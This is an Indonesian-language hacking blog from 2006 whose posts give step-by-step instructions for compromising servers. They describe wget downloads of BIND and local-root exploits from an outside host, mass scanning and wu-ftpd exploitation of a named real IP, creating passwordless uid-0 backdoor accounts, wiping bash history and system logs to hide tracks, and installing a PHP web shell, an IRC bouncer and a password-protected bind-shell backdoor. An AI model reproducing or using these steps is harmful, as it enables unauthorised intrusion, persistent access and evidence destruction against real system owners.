Saturday, January 14, 2006

ISC BIND expl BufferOveflow

Only For

SC BIND 8.2.2 p7 / ISC BIND 8.2.2 p6
ISC BIND 8.2.2 p5
+ Trustix Trustix Secure Linux 1.1 / 1.0
+ S.u.S.E. Linux 6.4ppc / 6.4alpha / 6.4 / 6.3 alpha / 6.3 / 6.2 / 6.1 alpha / 6.1 / 6.0
+ RedHat Linux 7.0J sparc / 7.0J i386 / 7.0J alpha / 7.0 sparc / 7.0 i386 / 7.0 alpha / 6.2E sparc / 6.2E i386 / 6.2E alpha / 6.2 sparc / 6.2 i386 / 6.2 alpha / 6.1 sparc / 6.1 i386 / 6.1 alpha / 6.0 sparc / 6.0 i386 / 6.0 alpha / 5.2 sparc / 5.2 i386 / 5.2 alpha
+ MandrakeSoft Linux Mandrake 7.2 / 7.1 / 7.0 / 6.1 / 6.0
+ IBM AIX 4.3.3 / 4.3.2 / 4.3.1 / 4.3
+ Debian Linux 2.3 sparc / 2.3 powerpc / 2.3 arm / 2.3 alpha / 2.3 68k / 2.3 / 2.2 sparc / 2.2 powerpc / 2.2 arm / 2.2 alpha / 2.2 68k / 2.2
+ Connectiva Linux 5.1 / 5.0 / 4.2 / 4.1 / 4.0es / 4.0
+ Caldera eServer 2.3 / 2.4
+ Caldera OpenLinux Desktop 2.3
ISC BIND 8.2.2 p4 / 8.2.2 p3 / 8.2.2 p2 / 8.2.2 p1 / 8.2.2 / 8.2.1
ISC BIND 8.2
- Slackware Linux 4.0
- RedHat Linux 6.1 i386 / 6.0 i386 / 5.2 i386 / 5.1 / Standard & Poors ComStock 4.2.4
- RedHat Linux 5.0 / 4.2 / 4.1 / 4.0
- IBM AIX 4.3.2 / 4.3.1 / 4.3
- Caldera OpenLinux 2.2 / 1.3

wget xgoogle.tk - iscbind
chmod
./

local explo 2

Only for Local Rooting

For RedHat 6.x or Mandrake 6.x

wget xgoogle.tk - le6.sh
chmod +x
./

For FreeBSD 2.2.x

wget xgoogle.tk - lebsd22
chmod
./

Success ? You got ROOT

Thursday, January 12, 2006

local explo

shell, dua session
wget xgoogle.tk ftp.tar & xpost.tar
tar -zxvf
cd

xpost
./scan (ip range) ex : ./scan 202.1
./masswu wu-scan.log
if keterangan = You Have Root In 211.240.56.254
then
211.240.56.254 > bisa di jebol

ftp
./awu 211.240.56.254
wait for
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
if whoami = root
then successfull

adduser
/usr/sbin/adduser buham -g wheel -s /bin/bash -d /home/buham
passwd buham
if
Changing password for user buham
passwd: all authentication tokens updated successfully
then
user successfull

get acces root

/usr/sbin/useradd crit -u 0 -d /
passwd -d crit

Done ?
covering tracks...

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

ctrl + d

Friday, January 06, 2006

BNC

Udah bosan bikin BOT
Pengen bikin PsyBNC, tapi kok ndak jalan yah ?

Pernah coba BNC, sama aja kok kayak psyBNC, cuman ndak OL 24 jam seh...

wget xgoogle.tk - prebnc.tgz
tar
cd
./bnc

konek ke host port 56560
pass buham

Shell in PHP

Menjalankan perintah CMD pake Inject? susah deh, ribet lage, pake bin backdoor? ndak jalan ? pake CGI Telnet ? mana bisa, gak ada akses CGI-BIN nyoh...

Ini alternatif nya

wget xgoogle.tk - shellphp.txt
mv

jalankan lewat browser...

kaya di putty deh :)

Monday, January 02, 2006

Backdoor dor dor dor

Salah satu teknik yang digunakan setelah kita berhasil masuk kedalam sebuah server, sebelum melakukan penetrasi/rooting lebih lanjut, biasanya kita meletakkan backdoor, yang salah satu fungsinya untuk masuk kembali ke server tersebut, dll.

wget xgoogle.tk - bintty
chmod
./bintty

done

open putty
telnet
PORT 1109
pass buhamania